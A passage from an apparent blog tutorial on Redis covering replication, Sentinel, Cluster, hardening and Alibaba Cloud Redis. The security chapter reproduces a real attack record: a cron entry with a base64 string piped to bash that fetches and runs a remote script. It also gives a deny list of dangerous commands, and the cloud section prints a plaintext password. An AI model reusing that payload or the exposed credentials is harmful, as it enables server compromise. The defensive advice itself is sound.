    : Every certain period of time, a certain number of keys in the expires dictionary of a certain number of databases will be scanned and the expired keys will be cleared. This strategy is a compromise between the first two. By adjusting the time interval of scheduled scans and the limited time consumption of each scan, the optimal balance between CPU and memory resources can be achieved under different circumstances.

Redis memory elimination strategy

Redis's memory elimination strategy refers to how to handle data that needs to be newly written and requires additional space to be applied for when Redis's memory for caching is insufficient.

Set the memory elimination policy in the actual project: maxmemory-policy allkeys-lru, remove the least recently used key

[Chapter 8]-Redis’ master-slave replication architecture

Introduction to Redis master-slave architecture

​ Master-slave replication refers to copying data from one Redis server to other Redis servers. The former is called the master node, and the latter is called the slave node. Data replication is one-way and can only be from the master node to the slave node.

By default, each Redis server is a master node; and a master node can have multiple slave nodes (or no slave nodes), but a slave node can only have one master node.

The slave node can also provide services to the outside world. The master node has data. The slave node can synchronize the data of the master node through replication operations. As the master node data continues to be written, the slave node data will also be updated synchronously.

​ In addition to the one-master-slave model, Redis also provides a master-multi-slave model, that is, a master can have multiple slaves, which is equivalent to having multiple copies of data.

Redis master-slave architecture principle

  • When the slave database is started, the SYNC command will be sent to the master database.
  • After receiving the SYNC command, the main database starts to save the snapshot in the background (RDB persistence), and caches the commands received during the snapshot saving period.
  • After the snapshot is completed, Redis (Master) sends the snapshot file and all cached commands to the slave database
  • When Redis (Slave) receives RDB and cache commands, it will start loading the snapshot file and execute the received cached commands.
  • Subsequently, whenever the master database receives a write command, it will synchronize the command to the slave database.

Redis master-slave architecture usage scenarios

When separation of reading and writing is required

  • Read-write separation can be achieved through master-slave replication to improve the load capacity of the server.
  • In common scenarios, the frequency of reading is much greater than that of writing.
  • When a single machine Redis cannot cope with a large number of read requests (especially requests that consume resources), multiple slave database nodes can be established through the master-slave replication function. The master database only performs write operations, and the slave database is responsible for read operations.
  • This kind of master-slave replication is more suitable for handling scenarios with more reads and less writes. When a single master database cannot meet the needs, you need to use the cluster function launched after Redis 3.0.

Need persistence from database

  • A relatively time-consuming operation in Redis is persistence. In order to improve performance, you can create one or more slave databases through master-slave replication, enable persistence in the slave database, and disable persistence in the master database (for example: disable AOF )
  • When the slave database crashes and restarts, the master database will automatically synchronize the data, so there is no need to worry about data loss.
  • When the main database crashes, we can use Sentinel to solve the problem later.

Redis master-slave architecture deployment and construction

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

[Chapter 9]-Redis’ Sentine Architecture

Introduction to Sentinel

Sentinel is a high-availability solution for Redis: a Sentinel system consisting of one or more Sentinel instances can monitor any number of master servers, as well as all slave servers under these master servers, and monitor the monitored master servers. When entering the offline state, a slave server under the offline master server will be automatically upgraded to the new master server.

Sentinel mode installation and deployment

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

API operation sentinel sentinel operation

code block

package cn.itcast.redis.api_test;

import org.junit.After;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPoolConfig;
import redis.clients.jedis.JedisSentinelPool;

import java.util.HashSet;
import java.util.Set;

public class ReidsSentinelTest {
    
    

    private JedisSentinelPool jedisSentinelPool;

    @BeforeTest
    public void beforeTest() {
    
    
        // JedisPoolConfig配置对象
        JedisPoolConfig config = new JedisPoolConfig();
        // 指定最大空闲连接为10个
        config.setMaxIdle(10);
        // 最小空闲连接5个
        config.setMinIdle(5);
        // 最大等待时间为3000毫秒
        config.setMaxWaitMillis(3000);
        // 最大连接数为50
        config.setMaxTotal(50);

        HashSet<String> sentinelSet = new HashSet<>();
        sentinelSet.add("8.130.25.36:26379");
        sentinelSet.add("8.130.48.66:26379");
        sentinelSet.add("8.130.26.68:26379");

        jedisSentinelPool = new JedisSentinelPool("mymaster", sentinelSet, config);
    }

    @Test
    public void keysTest() {
    
    
        // 1. 要操作Redis,肯定要获取Redis连接。现在通过哨兵连接池来获取连接
        Jedis jedis = jedisSentinelPool.getResource();

        // 2. 执行keys操作
        Set<String> keySet = jedis.keys("*");

        // 3. 遍历所有key
        for (String key : keySet) {
    
    
            System.out.println(key);
        }

        // 4. 再将连接返回到连接池
        jedis.close();
    }

    @AfterTest
    public void afterTest() {
    
    
        jedisSentinelPool.close();
    }
}

[Chapter 10]-Redis cluster architecture

Introduction and characteristics of Redis cluster

​ Redis initially used the master-slave mode for clustering. If the master goes down, you need to manually configure the slave to become the master. Later, the sentinel mode was proposed for high availability. In the sentinel mode, there is a sentinel to monitor the master and slave. If the master goes down, it can automatically switch to the master. The slave is converted into a master, but it also has a problem, that is, it cannot be dynamically expanded; so the cluster cluster mode was proposed in Redis 3.x.

​ Redis Cluster is a distributed architecture with multiple nodes. Each node is responsible for data reading and writing operations, and communication occurs between each node. Redis Cluster adopts a centerless structure. Each node saves data and the entire cluster status, and each node is connected to all other nodes.

Features:

  • All redis nodes are interconnected with each other (PING-PONG mechanism), and a binary protocol is used internally to optimize transmission speed and bandwidth;
  • The failure of a node takes effect only when more than half of the nodes in the cluster detect failures;
  • The client is directly connected to the redis node, without the need for an intermediate proxy layer. The client does not need to connect to all nodes in the cluster, but can connect to any available node in the cluster;
  • redis-cluster maps all physical nodes to [0-16383] slot (not necessarily evenly distributed), and cluster is responsible for maintaining node<->slot<->value;
  • The Redis cluster is pre-divided into 16384 buckets (Slots). When a key-value needs to be placed in the Redis cluster, it is decided according to the value of CRC16(key) & 16384 which bucket a key should be placed in.

The background to the implementation of redis cluster architecture

  • Master-slave replication cannot achieve high availability
  • As the company develops, the number of users increases and concurrency increases. The business requires higher QPS, and the QPS of a single machine in master-slave replication may not be able to meet business needs;
  • Considering the amount of data, when the existing server memory cannot meet the needs of business data, simply adding memory to the server cannot meet the requirements. At this time, it is necessary to consider the distribution requirements and distribute the data to different servers;
  • Due to network traffic requirements, the business traffic has exceeded the upper limit of the server's network card. Distribution can be considered for offloading;
  • Offline computing requires intermediate buffering and other requirements;
    in the storage engine framework (MySQL, HDFS, HBase, Redis, Elasticsearch, etc.), as long as the amount of data is large, a single machine cannot bear the pressure. The best way is to distribute the data. Storage management.

For the Redis in-memory database: a single Redis node cannot meet the requirements for the full amount of data. The data is divided into several subsets according to the partition rules.

Advantages of redis cluster architecture

  • Cache never goes down: Start the cluster and always have part of the cluster active. If the master node fails, the child nodes can quickly change roles to become the master node, and can continue to process commands even if some nodes in the entire cluster fail or are unreachable;
  • Quickly recover data: Persistent data can quickly solve the problem of data loss after a downtime;
  • Redis can use the memory of all machines to expand performance in disguise;
  • The computing power of Redis can be doubled by simply adding servers, and the network bandwidth of Redis will also double as the number of computers and network cards increases;
  • There is no central node in the Redis cluster, and a certain node will not become the performance bottleneck of the entire cluster;
  • Process data asynchronously to achieve fast reading and writing;

Redis Cluster cluster construction

For installation and deployment details, please see "Introduction to Various Deployments and Usage of Redis" https://blog.csdn.net/wt334502157/article/details/123211953

API operation redis cluster operation

package cn.itcast.redis.api_test;

import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.HostAndPort;
import redis.clients.jedis.JedisCluster;
import redis.clients.jedis.JedisPoolConfig;

import java.io.IOException;
import java.util.HashSet;

public class RedisClusterTest {
    
    
    private JedisCluster jedisCluster;

    @BeforeTest
    public void beforeTest() {
    
    
        HashSet<HostAndPort> hostAndPortSet = new HashSet<>();
        hostAndPortSet.add(new HostAndPort("8.130.25.36", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.48.66", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.26.68", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.48.74", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.29.79", 6379));
        hostAndPortSet.add(new HostAndPort("8.130.49.100", 6379));

        // JedisPoolConfig配置对象
        JedisPoolConfig config = new JedisPoolConfig();
        // 指定最大空闲连接为10个
        config.setMaxIdle(10);
        // 最小空闲连接5个
        config.setMinIdle(5);
        // 最大等待时间为3000毫秒
        config.setMaxWaitMillis(3000);
        // 最大连接数为50
        config.setMaxTotal(50);

        jedisCluster = new JedisCluster(hostAndPortSet, config);
    }
	

    @Test
    public void setTest() {
    
    
        jedisCluster.set("k2", "v2");
        System.out.println(jedisCluster.get("k2"));
    }
	

    @AfterTest
    public void afterTest() throws IOException {
    
    
        jedisCluster.close();
    }
}

[Chapter 11]-Various security strategies of Redis

1. Enable redis password authentication and set a high-complexity password

In the redis.conf configuration file, redis sets the configuration item requirepass and password authentication for account opening.

Open redis.conf, find where requirepass is located, and change it to the specified password. The password should meet the complexity requirements:
1. The length is more than 8
characters. 2. Contains three of the following four types of characters:
English uppercase letters (A to Z )
English lowercase letters (a to z)
10 basic numbers (0 to 9)
non-alphabetic characters (such as!, $, #, %, @, ^, &)
3. Avoid using weak passwords that have been published, such as: abcd .1234, admin@123, etc.
Remove the # comment character in front, and then restart redis

2. Monitoring on the public network is prohibited

Redis listens at 0.0.0.0, which may lead to the risk of lateral movement and penetration of services to the outside world or the internal network, and is easily exploited by hackers.

Configure the redis configuration file redis.conf as follows:
bind 127.0.0.1 or intranet IP, and then restart redis1

The following records represent a hacker attack:

127.0.0.1:6379> keys backup*
1) "backup1"
2) "backup4"
3) "backup3"
4) "backup2"
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> 
127.0.0.1:6379> get backup1
"\n\n\n*/2 * * * * root echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash \n\n"
127.0.0.1:6379> FLUSHALL
(error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the das configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for

I found that there were some more key-value pairs that were not written by myself, and the content was biased toward code script injection. I also received a warning from Alibaba Cloud:

[Alibaba Cloud] Dear [email protected]: Cloud Shield Cloud Security Center has detected an emergency security event on your server: 39.101.78.174 (redis01): malicious script code execution. It is recommended that you log in to the Cloud Security Center console immediately - Security alarm processing http://a.aliyun.com/f1.I5aW1 for processing.

Generally, by reporting an error and searching for a solution through Baidu, configurations such as permission writing will be released. Finally, the key value content written by the hacker will be successfully injected into the server. Therefore, when there is a public IP, it is very dangerous to monitor at 0.0.0.0 without user verification.

3. Disable startup using the root user

It is risky to use root privileges to run network services (both nginx and apache have independent work users, but redis does not). The redis crackit vulnerability is to use the root user's permissions to replace or add authorized_keys to obtain root login permissions

Use root to switch to the redis user to start the service:
useradd -s /sbin/nolog -M redis
sudo -u redis //redis-server //redis.conf

4. Restrict redis configuration file access permissions

Because the redis password is stored in plain text in the configuration file, it is necessary to prohibit irrelevant users from accessing the configuration file. Set the permissions of the redis configuration file to 600.

chmod 600 //redis.conf

5. Modify the default 6379 port

Avoid using well-known ports to reduce the risk of primary scanning

Edit the redis configuration file redis.conf, find the line containing port, change the default 6379 to a custom port number, and then restart redis

6. Turn on protected mode

Redis turns on protected mode by default. If bind and password are not specified in the configuration, after turning on this parameter, redis can only be accessed locally and external access is denied.

Turn on protected mode protected-mode yes

7. Disable or rename dangerous commands

For example, FLUSHALL deletes all data. It is also very dangerous to use the keys * command online when the amount of data is very large. Therefore, online Redis must consider disabling some dangerous commands, or try to prevent anyone from using these commands. Redis does not have a complete management system, but it also provides some solutions.

Modify the redis.conf file, add
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command KEYS ""
rename-command SHUTDOWN ""
rename-command DEL ""
rename-command EVAL ""
then Restart redis.
Rename to "" to disable the command. If you want to keep the command, you can rename it to an unguessable string, such as:
rename-command FLUSHALL joYAPNXRPmcarcR4ZDgC

[Chapter 12]-Cloud database Redis (Alibaba Cloud)

Introduction to cloud database Redis

ApsaraDB for Redis is a database service that is compatible with the open source Redis protocol standard and provides hybrid storage. It is based on dual-machine hot standby architecture and cluster architecture, and can meet business needs such as high throughput, low latency, and flexible configuration.

Advantages of cloud database Redis

  • The hardware is deployed in the cloud, providing complete infrastructure planning, network security and system maintenance services, so you can focus on business innovation.
  • Supports String (string), List (linked list), Set (collection), Sorted Set (ordered set), Hash (hash table), Stream (stream data) and other data structures, and also supports Transaction (transaction), Advanced functions such as Pub/Sub (message subscription and publishing).
  • Launched enterprise-level in-memory database products based on the community edition, providing performance-enhanced, persistent memory-based

Cloud database Redis application

Search redis through Alibaba Cloud products, select the appropriate configuration and apply.

After the purchase is completed, you can see the instance information in the Cloud Database Redis console.

From the management page, you can see that it is very rich in functions. It supports many functions such as network whitelist configuration, parameter adjustment, performance monitoring, account management and control, etc.

In the instance information, you can query the redis connection information, which is divided into internal network and external network access.

After finding the connection information, test the connection

[root@wangting ~]# redis-cli -h r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com -p 6379
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
(error) NOAUTH Authentication required.
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> auth r0uf24af1ijuio7q0pvi Wt@123456
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
(empty array)
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> set k1 v1
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> set k2 v2
OK

Cloud database Redis page management

Cloud database Redis is also equipped with online page management function. Find the connection database on the page.

After logging in, you can basically complete all required operations of redis.

Try to write a key-value pair through the interface

Go back to the command line to view

r0uf24af1ijuio7q0pvir0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> keys *
1) "k3"
2) "k1"
3) "k2"
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get k3
"\xe6\x9d\x8e\xe6\x98\x93\xe5\xb3\xb0\xe5\xab\x96\xe5\xa8\xbc\xe8\xa2\xab\xe6\x8a\x93\xe4\xba\x86\xef\xbc\x81"
# redis中文没有在控制台显示,因为启动redis时没有加--raw参数
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> exit
[root@wangting ~]# redis-cli -h r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com -p 6379 --raw
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get k3
NOAUTH Authentication required.
# 提示没有通过认证,重新auth认证操作
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> auth r0uf24af1ijuio7q0pvi Wt@123456
OK
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> get  k3
李易峰嫖娼被抓了!
r0uf24af1ijuio7q0pvi.redis.rds.aliyuncs.com:6379> 

The key-value pairs entered on the page can be successfully queried.

Guess you like

Origin blog.csdn.net/wt334502157/article/details/126847893